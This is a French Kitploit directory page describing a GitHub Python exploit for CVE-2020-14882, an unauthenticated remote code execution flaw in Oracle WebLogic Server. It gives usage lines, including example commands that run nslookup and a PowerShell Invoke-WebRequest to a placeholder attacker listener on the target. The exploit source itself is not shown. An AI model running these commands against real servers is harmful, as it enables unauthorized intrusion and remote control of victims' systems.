Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2020-14882 — Ce script permet l'exécution de code à distance (RCE) sur Oracle WebLogic Server. | Kitploit
Outils/GitHubGitHub/danny-lli/cve-2020-14882
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionOutil d'Accès à Distance
GitHubdanny-lli/cve-2020-14882

CVE-2020-14882

Ce script permet l'exécution de code à distance (RCE) sur Oracle WebLogic Server.

Voir le dépôt
212il y a 3 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2020-14882

Ce script permet l'exécution de code à distance (RCE) sur Oracle WebLogic Server à l'aide d'une requête GET non authentifiée. Il exploite la vulnérabilité CVE-2020-14882. En exécutant des commandes arbitraires, un attaquant peut obtenir un accès non autorisé au serveur.

Détails de l'exploit

  • Titre de l'exploit : Oracle WebLogic Server, RCE non authentifiée via requête GET
  • Auteur de l'exploit : Danny Safaya
  • CVE : CVE-2020-14882
  • Page d'accueil du fournisseur : Oracle WebLogic Server
  • Lien du logiciel : Téléchargements Oracle Middleware
  • Plus d'informations : Analyse de la RCE WebLogic par une seule requête GET (CVE-2020-14882)

Utilisation

Assurez-vous d'avoir Python 3 installé. Pour utiliser ce script, suivez les étapes ci-dessous :

  1. Ouvrez un terminal ou une invite de commandes.

  2. Exécutez le script à l'aide de la commande suivante :

    root@kitploit:~
    python3 exploit.py http(s)://target:7001 command
    

    Remplacez http(s)://target:7001 par l'URL cible du serveur Oracle WebLogic Server, puis par la commande souhaitée à exécuter.

command

Exemple 1 :

root@kitploit:~
python3 exploit.py http(s)://target:7001 "nslookup your_Domain"

Cet exemple exécute la commande nslookup your_Domain sur le serveur cible.

Exemple 2 :

root@kitploit:~
python3 exploit.py http(s)://target:7001 "powershell.exe -c Invoke-WebRequest -Uri http://your_listener"

Cet exemple exécute la commande PowerShell Invoke-WebRequest -Uri http://your_listener sur le serveur cible.

Avertissement

Ce script est destiné uniquement aux tests d'intrusion autorisés et à des fins de recherche en sécurité. L'utilisation non autorisée de ce script pour exploiter des systèmes sans consentement approprié est illégale et peut entraîner des conséquences juridiques. Utilisez-le à vos propres risques.

Dépendances

Ce script nécessite les dépendances suivantes :

  • requests
  • urllib3

Veuillez vous assurer que ces dépendances sont installées avant d'exécuter le script.


Télécharger l’outil